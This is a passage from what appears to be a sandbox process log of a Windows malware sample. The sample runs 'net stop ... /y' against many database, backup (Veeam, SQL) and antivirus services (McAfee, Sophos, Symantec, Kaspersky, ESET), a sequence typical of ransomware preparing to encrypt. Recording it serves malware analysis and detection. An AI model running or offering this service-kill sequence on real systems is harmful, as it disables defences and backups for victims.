C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLSERVER /y
3⤵
PID:2644

C:\Windows\SysWOW64\net.exe
net stop MSSQLSERVER /y
4⤵
PID:5028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
5⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper /y
3⤵
PID:4844

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper /y
4⤵
PID:3680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
5⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerADHelper100 /y
3⤵
PID:4720

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100 /y
4⤵
PID:5036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
5⤵
PID:4036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLServerOLAPService /y
3⤵
PID:4756

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerOLAPService /y
4⤵
PID:916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
5⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop McAfeeEngineService /y
3⤵
PID:1020

C:\Windows\SysWOW64\net.exe
net stop McAfeeEngineService /y
4⤵
PID:4236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
5⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop McAfeeFramework /y
3⤵
PID:3532

C:\Windows\SysWOW64\net.exe
net stop McAfeeFramework /y
4⤵
PID:1524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
5⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:3888

C:\Windows\SysWOW64\net.exe
net stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:4224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
5⤵
PID:4200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop McShield /y
3⤵
PID:3932

C:\Windows\SysWOW64\net.exe
net stop McShield /y
4⤵
PID:3688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
5⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop McTaskManager /y
3⤵
PID:4124

C:\Windows\SysWOW64\net.exe
net stop McTaskManager /y
4⤵
PID:4264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
5⤵
PID:2980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer /y
3⤵
PID:2440

C:\Windows\SysWOW64\net.exe
net stop MsDtsServer /y
4⤵
PID:4880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
5⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer100 /y
3⤵
PID:2024

C:\Windows\SysWOW64\net.exe
net stop MsDtsServer100 /y
4⤵
PID:2276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
5⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MsDtsServer110 /y
3⤵
PID:2064

C:\Windows\SysWOW64\net.exe
net stop MsDtsServer110 /y
4⤵
PID:3212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
5⤵
PID:3488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MySQL57 /y
3⤵
PID:3264

C:\Windows\SysWOW64\net.exe
net stop MySQL57 /y
4⤵
PID:1156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
5⤵
PID:2584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MySQL80 /y
3⤵
PID:4136

C:\Windows\SysWOW64\net.exe
net stop MySQL80 /y
4⤵
PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
5⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop NetMsmqActivator /y
3⤵
PID:4192

C:\Windows\SysWOW64\net.exe
net stop NetMsmqActivator /y
4⤵
PID:4976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
5⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop OracleClientCache80 /y
3⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net stop OracleClientCache80 /y
4⤵
PID:4132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
5⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop PDVFSService /y
3⤵
PID:4624

C:\Windows\SysWOW64\net.exe
net stop PDVFSService /y
4⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
5⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop POP3Svc /y
3⤵
PID:1712

C:\Windows\SysWOW64\net.exe
net stop POP3Svc /y
4⤵
PID:996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
5⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop RESvc /y
3⤵
PID:3632

C:\Windows\SysWOW64\net.exe
net stop RESvc /y
4⤵
PID:460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
5⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ReportServer /y
3⤵
PID:4156

C:\Windows\SysWOW64\net.exe
net stop ReportServer /y
4⤵
PID:4656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
5⤵
PID:3608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$SQL_2008 /y
3⤵
PID:1416

C:\Windows\SysWOW64\net.exe
net stop ReportServer$SQL_2008 /y
4⤵
PID:1648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
5⤵
PID:672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$SYSTEM_BGC /y
3⤵
PID:5060

C:\Windows\SysWOW64\net.exe
net stop ReportServer$SYSTEM_BGC /y
4⤵
PID:1248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
5⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPS /y
3⤵
PID:400

C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPS /y
4⤵
PID:760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
5⤵
PID:4036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ReportServer$TPSAMA /y
3⤵
PID:4180

C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPSAMA /y
4⤵
PID:4204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
5⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SAVAdminService /y
3⤵
PID:3344

C:\Windows\SysWOW64\net.exe
net stop SAVAdminService /y
4⤵
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
5⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SAVService /y
3⤵
PID:4236

C:\Windows\SysWOW64\net.exe
net stop SAVService /y
4⤵
PID:1112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
5⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SDRSVC /y
3⤵
PID:4828

C:\Windows\SysWOW64\net.exe
net stop SDRSVC /y
4⤵
PID:2080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
5⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SMTPSvc /y
3⤵
PID:1688

C:\Windows\SysWOW64\net.exe
net stop SMTPSvc /y
4⤵
PID:1816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
5⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SNAC /y
3⤵
PID:1500

C:\Windows\SysWOW64\net.exe
net stop SNAC /y
4⤵
PID:4592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SNAC /y
5⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$BKUPEXEC /y
3⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$BKUPEXEC /y
4⤵
PID:4264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
5⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:2388

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:4880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
5⤵
PID:4872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$CXDB /y
3⤵
PID:2196

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CXDB /y
4⤵
PID:1972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
5⤵
PID:2276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$ECWDB2 /y
3⤵
PID:5088

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ECWDB2 /y
4⤵
PID:5092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
5⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:4748

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEBGC /y
4⤵
PID:912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
5⤵
PID:2584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:3928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
5⤵
PID:3980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROD /y
3⤵
PID:3968

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROD /y
4⤵
PID:3176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
5⤵
PID:3124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:1276

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:4332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
5⤵
PID:3280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SBSMONITORING /y
3⤵
PID:4468

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SBSMONITORING /y
4⤵
PID:4232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
5⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SHAREPOINT /y
3⤵
PID:1920

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SHAREPOINT /y
4⤵
PID:3104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
5⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SOPHOS /y
3⤵
PID:3464

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SOPHOS /y
4⤵
PID:4796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
5⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQLEXPRESS /y
3⤵
PID:4064

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS /y
4⤵
PID:1580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
5⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SQL_2008 /y
3⤵
PID:404

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQL_2008 /y
4⤵
PID:4156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
5⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:2676

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:5032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
5⤵
PID:3680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPS /y
3⤵
PID:5072

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPS /y
4⤵
PID:3772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
5⤵
PID:5036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$TPSAMA /y
3⤵
PID:2312

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPSAMA /y
4⤵
PID:972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
5⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:4276

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:3540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:1536

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:4584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:1020

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:2080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
5⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLBrowser /y
3⤵
PID:4828

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser /y
4⤵
PID:1776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
5⤵
PID:2008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLSERVERAGENT /y
3⤵
PID:4200

C:\Windows\SysWOW64\net.exe
net stop SQLSERVERAGENT /y
4⤵
PID:2072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
5⤵
PID:4316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLSafeOLRService /y
3⤵
PID:3048

C:\Windows\SysWOW64\net.exe
net stop SQLSafeOLRService /y
4⤵
PID:1000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
5⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY /y
3⤵
PID:1560

C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY /y
4⤵
PID:2180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
5⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:2276

C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:1132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
5⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SQLWriter /y
3⤵
PID:2236

C:\Windows\SysWOW64\net.exe
net stop SQLWriter /y
4⤵
PID:1168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
5⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SamSs /y
3⤵
PID:3944

C:\Windows\SysWOW64\net.exe
net stop SamSs /y
4⤵
PID:5068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
5⤵
PID:3980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SepMasterService /y
3⤵
PID:2780

C:\Windows\SysWOW64\net.exe
net stop SepMasterService /y
4⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
5⤵
PID:2296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ShMonitor /y
3⤵
PID:3396

C:\Windows\SysWOW64\net.exe
net stop ShMonitor /y
4⤵
PID:4092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
5⤵
PID:4772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SmcService /y
3⤵
PID:3476

C:\Windows\SysWOW64\net.exe
net stop SmcService /y
4⤵
PID:2028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
5⤵
PID:4908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop Smcinst /y
3⤵
PID:3720

C:\Windows\SysWOW64\net.exe
net stop Smcinst /y
4⤵
PID:1664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
5⤵
PID:3908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SntpService /y
3⤵
PID:316

C:\Windows\SysWOW64\net.exe
net stop SntpService /y
4⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
5⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop SstpSvc /y
3⤵
PID:1056

C:\Windows\SysWOW64\net.exe
net stop SstpSvc /y
4⤵
PID:996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
5⤵
PID:724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop TmCCSF /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net stop TmCCSF /y
4⤵
PID:212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
5⤵
PID:460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop TrueKey /y
3⤵
PID:656

C:\Windows\SysWOW64\net.exe
net stop TrueKey /y
4⤵
PID:3892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
5⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop TrueKeyScheduler /y
3⤵
PID:1648

C:\Windows\SysWOW64\net.exe
net stop TrueKeyScheduler /y
4⤵
PID:4968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
5⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop TrueKeyServiceHelper /y
3⤵
PID:2644

C:\Windows\SysWOW64\net.exe
net stop TrueKeyServiceHelper /y
4⤵
PID:3304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
5⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop UI0Detect /y
3⤵
PID:5052

C:\Windows\SysWOW64\net.exe
net stop UI0Detect /y
4⤵
PID:1244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
5⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamBackupSvc /y
3⤵
PID:4180

C:\Windows\SysWOW64\net.exe
net stop VeeamBackupSvc /y
4⤵
PID:4724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
5⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamBrokerSvc /y
3⤵
PID:4424

C:\Windows\SysWOW64\net.exe
net stop VeeamBrokerSvc /y
4⤵
PID:4612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
5⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamCatalogSvc /y
3⤵
PID:3644

C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc /y
4⤵
PID:3924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
5⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamCloudSvc /y
3⤵
PID:4236

C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc /y
4⤵
PID:3640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
5⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamDeploySvc /y
3⤵
PID:5080

C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc /y
4⤵
PID:3688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
5⤵
PID:3324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamDeploymentService /y
3⤵
PID:1824

C:\Windows\SysWOW64\net.exe
net stop VeeamDeploymentService /y
4⤵
PID:5020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
5⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamEnterpriseManagerSvc /y
3⤵
PID:3400

C:\Windows\SysWOW64\net.exe
net stop VeeamEnterpriseManagerSvc /y
4⤵
PID:2388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
5⤵
PID:2812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamHvIntegrationSvc /y
3⤵
PID:4040

C:\Windows\SysWOW64\net.exe
net stop VeeamHvIntegrationSvc /y
4⤵
PID:2024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
5⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamMountSvc /y
3⤵
PID:4912

C:\Windows\SysWOW64\net.exe
net stop VeeamMountSvc /y
4⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
5⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamNFSSvc /y
3⤵
PID:2236

C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc /y
4⤵
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
5⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamRESTSvc /y
3⤵
PID:2172

C:\Windows\SysWOW64\net.exe
net stop VeeamRESTSvc /y
4⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
5⤵
PID:3224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop VeeamTransportSvc /y
3⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc /y
4⤵
PID:3544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
5⤵
PID:3968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop W3Svc /y
3⤵
PID:3176

C:\Windows\SysWOW64\net.exe
net stop W3Svc /y
4⤵
PID:3940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
5⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop WRSVC /y
3⤵
PID:3476

C:\Windows\SysWOW64\net.exe
net stop WRSVC /y
4⤵
PID:2844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
5⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop bedbg /y
3⤵
PID:3720

C:\Windows\SysWOW64\net.exe
net stop bedbg /y
4⤵
PID:3468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
5⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ekrn /y
3⤵
PID:4624

C:\Windows\SysWOW64\net.exe
net stop ekrn /y
4⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
5⤵
PID:3464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop kavfsslp /y
3⤵
PID:3136

C:\Windows\SysWOW64\net.exe
net stop kavfsslp /y
4⤵
PID:32

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
5⤵
PID:1428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop klnagent /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net stop klnagent /y
4⤵
PID:4560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
5⤵
PID:116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop macmnsvc /y
3⤵
PID:4156

C:\Windows\SysWOW64\net.exe
net stop macmnsvc /y
4⤵
PID:4280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
5⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop masvc /y
3⤵
PID:3680

C:\Windows\SysWOW64\net.exe
net stop masvc /y
4⤵
PID:5116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
5⤵
PID:4680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop mfefire /y
3⤵
PID:5036

C:\Windows\SysWOW64\net.exe
net stop mfefire /y
4⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop mfemms /y
3⤵
PID:2252

C:\Windows\SysWOW64\net.exe
net stop mfemms /y
4⤵
PID:852
